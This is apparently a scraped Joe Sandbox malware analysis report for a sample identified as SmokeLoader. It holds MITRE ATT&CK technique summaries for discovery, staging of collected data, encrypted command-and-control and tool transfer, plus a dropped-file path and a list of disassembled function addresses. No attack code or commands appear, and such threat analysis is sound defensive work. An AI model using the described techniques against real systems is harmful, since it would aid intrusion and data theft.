Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FyDBXJE74v.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: SmokeLoader

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\wsbgrgh

C:\Users\user\AppData\Roaming\wsbgrgh:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Windows Analysis Report
FyDBXJE74v.exe

Function 00415F50 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 288
filepipetimeCOMMON

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162
nativeCOMMON

Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168
nativethreadCOMMON

Function 02CA0A22 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Function 02BC003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Function 00415BD0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
librarymemoryloaderCOMMON

Function 02BC0E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON